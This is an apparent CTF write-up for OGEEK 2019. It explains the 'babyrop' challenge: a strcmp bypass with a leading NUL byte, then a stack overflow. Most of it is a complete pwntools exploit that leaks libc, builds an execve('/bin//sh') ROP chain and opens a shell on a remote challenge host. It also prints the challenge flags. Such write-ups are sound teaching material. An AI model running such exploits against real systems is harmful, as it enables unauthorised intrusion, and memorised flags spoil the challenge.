OGEEK 2019 Writeup

签到

flag{Reno}

babyrop

The program reads a user-supplied string and compares it against a randomly generated one with `strcmp`; only when the comparison reports a match does execution reach the vulnerable read, which overflows a stack buffer.

The check can be bypassed by starting the input with `'\x00'`: `strcmp` stops at the first NUL byte, so the comparison never sees the rest of the input (the trailing `\xff` bytes sent below are presumably what the binary later uses as the read length — confirm in the disassembly). With the overflow reachable, the first stage returns into `puts(puts@got)` to leak the libc base (the GOT entry is resolved because `puts` has already been called), and the second stage runs a ROPgadget-generated chain that writes `/bin//sh` into libc's `.data` and issues `execve` via `int 0x80`. All libc offsets below are specific to the challenge's `libc-2.23.so`; with any other build they must be regenerated, and a leaked base that is not page aligned is a sign of the wrong libc.

from pwn import *
from struct import pack
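# r = process('./babyrop')   # local alternative to the remote target, for debugging

# Addresses inside the (non-PIE) babyrop binary.
PUTS_PLT = 0x08048548
PUTS_GOT = 0x08049FD4
# Return address placed after puts in stage 1. It is presumably the start of the
# routine containing the check + vulnerable read, since the script passes the
# bypass a second time afterwards -- confirm against the binary.
RET_ADDR = 0x08048825
# Distance from the start of the overflowed buffer to the saved return address.
PADDING = 0xeb
# Leading NUL terminates the strcmp early; the trailing 0xff bytes appear to be
# consumed later as a length (not visible here -- verify in the disassembly).
BYPASS = b'\x00' + b'\xff' * 0x10

# Gadget and data offsets relative to the libc-2.23.so base (ROPgadget output).
# They are only valid for that exact libc build.
POP_EDX = 0x00001aa6      # pop edx ; ret
POP_EAX = 0x00023f97      # pop eax ; ret
POP_EBX = 0x00018395      # pop ebx ; ret
POP_ECX = 0x000b4047      # pop ecx ; ret
MOV_EDX_EAX = 0x0006b34b  # mov dword ptr [edx], eax ; ret
XOR_EAX = 0x0002c5fc      # xor eax, eax ; ret
INC_EAX = 0x00007eec      # inc eax ; ret
INT80 = 0x00002c87        # int 0x80
DATA = 0x001b0040         # writable scratch space (libc .data) for "/bin//sh\0"


def build_leak_payload():
    """Stage-1 overflow: call puts(puts@got), then return to RET_ADDR.

    Returns the raw bytes to send (padding included).
    """
    return (b'a' * PADDING
            + pack('<I', PUTS_PLT)
            + pack('<I', RET_ADDR)
            + pack('<I', PUTS_GOT))


def build_ropchain(libc_base):
    """Stage-2 chain: write "/bin//sh\\0" into libc .data and execve it via int 0x80.

    libc_base: leaked base address of libc-2.23.so.
    Returns the chain only; the caller prepends the stack padding.
    """
    def at(offset):
        # absolute address of a gadget or data slot in the leaked libc
        return pack('<I', libc_base + offset)

    chain = [
        at(POP_EDX), at(DATA),          # edx = &.data
        at(POP_EAX), b'/bin',           # eax = "/bin"
        at(MOV_EDX_EAX),                # .data[0:4]  = "/bin"
        at(POP_EDX), at(DATA + 4),
        at(POP_EAX), b'//sh',
        at(MOV_EDX_EAX),                # .data[4:8]  = "//sh"
        at(POP_EDX), at(DATA + 8),
        at(XOR_EAX),
        at(MOV_EDX_EAX),                # .data[8:12] = 0 (NUL terminator)
        at(POP_EBX), at(DATA),          # ebx = path
        at(POP_ECX), at(DATA + 8),      # ecx = argv  -> points at the zero dword
        at(POP_EDX), at(DATA + 8),      # edx = envp  -> same zero dword
        at(XOR_EAX),
    ]
    chain += [at(INC_EAX)] * 11         # eax = 11 = SYS_execve on i386
    chain.append(at(INT80))
    return b''.join(chain)


def main():
    context.log_level = 'debug'
    libc = ELF('libc-2.23.so')
    r = remote('47.112.137.238', 13337)

    # Stage 1: pass the check, overflow, and leak the resolved puts@got entry.
    r.sendline(BYPASS)
    r.recv()  # "Correct!" banner
    sleep(1)
    r.send(build_leak_payload())
    # Read exactly the 4 leaked bytes: a bare recv() may return more or fewer,
    # and u32() requires exactly four.
    leaked_puts = u32(r.recvn(4))
    libc_base = leaked_puts - libc.symbols['puts']
    log.info('puts @ %#x, libc base @ %#x', leaked_puts, libc_base)
    if libc_base & 0xfff:
        # A misaligned base means the leak or the libc file is wrong; the
        # hard-coded gadget offsets would then point anywhere.
        log.error('libc base %#x is not page aligned -- wrong libc or bad leak', libc_base)

    # Stage 2: pass the check again and run the execve chain.
    r.sendline(BYPASS)
    r.send(b'a' * PADDING + build_ropchain(libc_base))
    r.interactive()


if __name__ == '__main__':
    main()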

flag{BXCTFKKAZ8!bw&kN}